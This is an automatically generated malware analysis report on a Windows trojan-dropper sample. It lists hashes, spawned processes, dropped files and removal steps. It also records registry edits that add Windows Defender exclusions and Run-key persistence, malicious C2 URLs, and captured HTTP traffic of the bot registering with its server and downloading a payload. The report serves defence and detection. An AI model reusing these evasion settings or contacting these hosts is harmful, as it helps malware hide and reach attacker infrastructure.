Trojan-Dropper.Win32.Agent.bjtdqj_abc8d5cf58


by malwarelabrobot on September 4th, 2017 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjtdqj (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: abc8d5cf58cba5cc542613963932956d
SHA1: d5affaffd1450bfcc3ad16dea09d8dd918fbaba9
SHA256: b23680597ae27d1287fd303bb89a689f439d799e684be018474e517bc611745d
SSDeep: 98304:4HiT8Gn22jG3iaKAjJKlEE2AQGJVMvNAU7R1C:4HiYGfGS32JVEpPyaUdY
Size: 4590592 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for the stealth installation of other malware onto the user's system.

Payload

No specific payload has been found.

Process activity

The Trojan-Dropper creates the following process(es):

netsh.exe:3804
netsh.exe:532
%original file name%.exe:2936
%original file name%.exe:1084
CompMgmtLauncher.exe:4064
windefender.exe:3892
windefender.exe:4004

The Trojan-Dropper injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2936 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Windows\rss\csrss.exe (72080 bytes)

The process CompMgmtLauncher.exe:4064 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\csrss\windefender.exe (730 bytes)

The process windefender.exe:4004 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Windows\windefender.exe (52533 bytes)

Registry activity

The process netsh.exe:3804 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"napipsec.dll,-4" = "1.0"
"eapqec.dll,-100" = "EAP Quarantine Enforcement Client"
"tsgqec.dll,-103" = "Microsoft Corporation"
"napipsec.dll,-1" = "IPsec Relying Party"
"napipsec.dll,-2" = "Provides IPsec based enforcement for Network Access Protection"
"napipsec.dll,-3" = "Microsoft Corporation"
"eapqec.dll,-103" = "Microsoft Corporation"
"tsgqec.dll,-100" = "RD Gateway Quarantine Enforcement Client"

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"dhcpqec.dll,-101" = "Provides DHCP based enforcement for NAP"
"dhcpqec.dll,-100" = "DHCP Quarantine Enforcement Client"
"dhcpqec.dll,-103" = "1.0"
"dhcpqec.dll,-102" = "Microsoft Corporation"
"tsgqec.dll,-101" = "Provides RD Gateway enforcement for NAP"
"eapqec.dll,-101" = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
"eapqec.dll,-102" = "1.0"
"tsgqec.dll,-102" = "1.0"

The process netsh.exe:532 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process %original file name%.exe:2936 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"Windefender.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"csrss" = "0"

[HKCU\Software\Microsoft\TestApp]
"Defender" = "1"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Roaming\EpicNet Inc]
"cloudnet" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows]
"RSS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Roaming]
"TwilightStar" = "0"

[HKCU\Software\Microsoft\TestApp]
"Firewall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"cloudnet.exe" = "0"

To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"TwilightStar" = "C:\Windows\rss\csrss.exe"

The process %original file name%.exe:1084 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\TestApp]
"osArchitecture" = "32"
"PatchTime" = "Type: REG_QWORD, Length: 8"
"OSCaption" = "Microsoft Windows 7 Ultimate"
"FirstInstallDate" = "Type: REG_QWORD, Length: 8"
"uuid" = ""
"AV" = ""
"Defender" = ""
"IsAdmin" = "1"
"Server" = "http://rentahouseanton.com"
"CloudnetSource" = ""
"Name" = "TwilightStar"
"cpu" = "Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz"
"InstallCloudnet" = "1"
"ServiceVersion" = ""
"Firewall" = ""
"GPU" = "VMware SVGA 3D (Microsoft Corporation - WDDM)"
"Command" = "Type: REG_QWORD, Length: 8"

The process CompMgmtLauncher.exe:4064 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"mycomput.dll,-112" = "Manages disks and provides access to other tools to manage local and remote computers."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process windefender.exe:3892 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\TestApp]
"ServiceVersion" = "0.4"

Dropped PE files

MD5 File path
b52562b4e7edf2a1af4974f9aac7558c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\csrss\windefender.exe
533af2f594b5c4536ec8cf93abaec514 c:\Windows\System32\drivers\Winmon.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 3608429 3608576 4.30506 5e9d52a58d29b1ace9aec0e132fecadd
.data 3612672 1071496 979456 5.38915 68d7c401277ccf51a4b7627c8cb26510
.idata 4685824 882 1024 2.96819 d3e8e8b4aae03817d6a7921f74bfba09
.symtab 4689920 4 512 0.014135 07b5472d347d42780469fb2654b7fc54

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://rentahouseanton.com/bots/install-failure 85.114.141.81
hxxp://rentahouseanton.com/bots/register 85.114.141.81
hxxp://rentahouseanton.com/n/watchdog.exe 85.114.141.81
hxxp://readlenta.ru/n/watchdog.exe 85.114.141.81


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /bots/register HTTP/1.1
Host: rentahouseanton.com
User-Agent: Go-http-client/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

Data[appname]=TwilightStar&Data[arch]=32&Data[av]=&Data[build_number]=7601&Data[compaign_id]=&Data[cpu]=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Data[defender]=1&Data[exploited]=1&Data[firewall]=1&Data[gpu]=VMware SVGA 3D (Microsoft Corporation - WDDM)&Data[is_admin]=1&Data[os]=Microsoft Windows 7 Ultimate &Data[username]=adm&Data[version]=0.2.16
HTTP/1.1 200 OK
Server: nginx/1.12.1
Date: Sun, 03 Sep 2017 18:32:26 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.8
2f..{"uuid":"a85355d5-8cc5-4af7-8449-5d0e90313cfc"}..0..


POST /bots/install-failure HTTP/1.1
Host: rentahouseanton.com
User-Agent: Go-http-client/1.1
Content-Length: 86
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

compaign_id=&reason=couldn't create a scheduled task: exit status 1&version=0.2.16
HTTP/1.1 200 OK
Server: nginx/1.12.1
Date: Sun, 03 Sep 2017 18:32:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.8
Content-Encoding: gzip


GET /n/watchdog.exe HTTP/1.1
Host: readlenta.ru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip


HTTP/1.1 200 OK
Server: nginx/1.12.1
Date: Sun, 03 Sep 2017 18:32:28 GMT
Content-Type: application/octet-stream
Content-Length: 3430912
Last-Modified: Fri, 01 Sep 2017 16:01:11 GMT
Connection: keep-alive
ETag: "59a98447-345a00"
Access-Control-Allow-Origin: *
Accept-Ranges: bytes

<<< skipped >>>

POST /bots/install-failure HTTP/1.1
Host: rentahouseanton.com
User-Agent: Go-http-client/1.1
Content-Length: 86
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

compaign_id=&reason=couldn't create a scheduled task: exit status 1&version=0.2.16
HTTP/1.1 200 OK
Server: nginx/1.12.1
Date: Sun, 03 Sep 2017 18:32:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.8
Content-Encoding: gzip


The Trojan-Dropper connects to the servers at the following location(s):

TrustedInstaller.exe_160:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    netsh.exe:3804
    netsh.exe:532
    %original file name%.exe:2936
    %original file name%.exe:1084
    CompMgmtLauncher.exe:4064
    windefender.exe:3892
    windefender.exe:4004

  2. Delete the original Trojan-Dropper file.
  3. Delete or disinfect the following files created/modified by the Trojan-Dropper:

    C:\Windows\rss\csrss.exe (72080 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\csrss\windefender.exe (730 bytes)
    C:\Windows\windefender.exe (52533 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "TwilightStar" = "C:\Windows\rss\csrss.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
